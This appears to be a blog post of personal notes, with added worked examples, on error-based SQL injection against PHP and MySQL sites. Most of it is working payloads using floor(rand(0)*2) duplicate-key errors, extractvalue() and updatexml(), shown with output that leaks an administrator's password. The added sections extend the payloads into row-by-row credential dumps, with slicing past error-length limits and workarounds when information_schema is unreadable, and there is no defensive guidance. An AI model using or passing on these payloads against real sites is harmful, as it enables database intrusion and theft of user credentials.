Posting some old notes of mine. When MySQL fails to execute a statement it returns an error message, and PHP+MySQL sites often print that error straight onto the page, so crafted input can use the following three methods to pull specific data out of the database.
Test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Errors via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:
mysql> select * from article where id = 1 and (select 1 from
    (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the duplicate-key error (the trailing 1 is the floor(rand(0)*2) value that concat() appended, not part of the version string). To read other data, replace version() with the subquery of interest.

For example, to get the administrator's credentials (here the pass column; the user column is read the same way):

Method 1:

mysql> select * from article where id = 1 and (select 1 from
    (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
    from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
    from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
    floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
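Added example (mine, not from the original notes or the work they are based on) showing why the floor() trick errors and how to turn it into a row-by-row dump. It assumes the same test schema as above (test.admin with id/user/pass, test.article with id/title/content) and an application that echoes the MySQL error text; the placeholder <user> stands for whatever the admin.user column holds, which the notes never show.

```sql
-- Added example, not part of the original notes. Same test schema as above,
-- same assumption that the MySQL error text reaches the page.

-- (a) Why it works. rand(0) is a fixed pseudo-random sequence (rand() with no
--     seed would make the collision a matter of luck), and floor(rand(0)*2)
--     over successive rows yields 0, 1, 1, 0, 1, 1, ...  GROUP BY fills a
--     temporary table keyed on x; MySQL evaluates x once to look the key up
--     and again when it inserts a missing key, so from the third source row
--     on the second evaluation collides with a key that is already there and
--     raises ERROR 1062.  Both count(*) and GROUP BY are needed to force that
--     temporary table.  Any source with at least three rows works, so a UNION
--     removes the dependence on information_schema.tables:
SELECT * FROM article WHERE id = 1 AND (
  SELECT 1 FROM (
    SELECT count(*),
           concat((SELECT pass FROM admin LIMIT 1), floor(rand(0)*2)) AS x
    FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) AS src
    GROUP BY x
  ) AS a
);
-- ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

-- (b) Count the rows before dumping them. 0x7e is '~'; hex literals keep
--     quotes out of the payload and the markers delimit the leaked value:
SELECT * FROM article WHERE id = 1 AND (
  SELECT 1 FROM (
    SELECT count(*),
           concat(0x7e, (SELECT count(*) FROM admin), 0x7e, floor(rand(0)*2)) AS x
    FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) AS src
    GROUP BY x
  ) AS a
);
-- Duplicate entry '~N~1': N is the row count, the final 1 is the floor() digit.

-- (c) Dump user and pass together, one row per request, by moving the LIMIT
--     offset (0,1 then 1,1 then 2,1 ...). 0x3a is ':'.
SELECT * FROM article WHERE id = 1 AND (
  SELECT 1 FROM (
    SELECT count(*),
           concat(0x7e,
                  (SELECT concat(user, 0x3a, pass) FROM admin LIMIT 0,1),
                  0x7e, floor(rand(0)*2)) AS x
    FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) AS src
    GROUP BY x
  ) AS a
);
-- Duplicate entry '~<user>:admin888~1' for key 'group_key'
-- (<user> is a placeholder: the notes never show the admin.user value)

-- (d) ERROR 1062 prints at most 64 characters of the offending key, so a
--     longer value is read in slices with substring(value, offset, length):
--     substring((SELECT pass FROM admin LIMIT 1), 1, 60), then offset 61, ...
```

The derived-table form in (a) is also the one to reach for when information_schema is not readable by the application's database account; everything the payload needs is then generated inside the query itself.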
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
    (select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

0x5c is a backslash, which makes the XPath expression invalid, so the parser echoes the whole string, password included, in the error message.

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test (0x5e24 is '^$', again chosen only to make the XPath invalid):

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
    (select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
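Added example (mine, not from the original notes) covering ExtractValue and UpdateXml together, since they fail the same way: what the 32-character limit on the echoed XPath string means in practice, and how to read longer values and several rows. Same test schema and assumptions as above; <user> is again a placeholder for the admin.user value, which the notes never show.

```sql
-- Added example, not part of the original notes. Same test schema as above,
-- same assumption that the MySQL error text reaches the page.
-- extractvalue(xml, xpath) and updatexml(xml, xpath, new_xml), available from
-- MySQL 5.1 on, parse their XPath argument before touching the XML, and an
-- invalid XPath string is echoed back in ERROR 1105.  The echo is capped at
-- 32 characters, which is the practical difference from the floor() method
-- (64 characters in ERROR 1062).

-- The separator exists only to make the XPath invalid: 0x7e ('~') cannot
-- start an XPath step, and as a hex literal it avoids quotes in the payload.
-- 0x3a is ':'.
SELECT * FROM article WHERE id = 1
  AND extractvalue(1, concat(0x7e, (SELECT concat(user, 0x3a, pass) FROM admin LIMIT 0,1), 0x7e));
-- ERROR 1105 (HY000): XPATH syntax error: '~<user>:admin888~'

-- Several rows in one request with group_concat (default separator ','):
SELECT * FROM article WHERE id = 1
  AND updatexml(1, concat(0x7e, (SELECT group_concat(user, 0x3a, pass) FROM admin)), 1);

-- Long values: the 32-character window includes the leading '~', so take 31
-- characters per request and advance the offset by 31 until the returned
-- slice comes back shorter than 31 characters.
SELECT * FROM article WHERE id = 1
  AND updatexml(1, concat(0x7e, substring((SELECT group_concat(user, 0x3a, pass) FROM admin), 1, 31)), 1);
SELECT * FROM article WHERE id = 1
  AND updatexml(1, concat(0x7e, substring((SELECT group_concat(user, 0x3a, pass) FROM admin), 32, 31)), 1);

-- group_concat is itself capped by group_concat_max_len (1024 bytes by
-- default), so a large table still needs LIMIT offset,1 per row as in the
-- floor() example.
```

The notes wrap updatexml() in `1=(...)`; the bare `AND updatexml(...)` form above works just as well, because the error is raised while the XPath argument is parsed, before the comparison is ever evaluated.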
That's all. Thanks, foreign guys.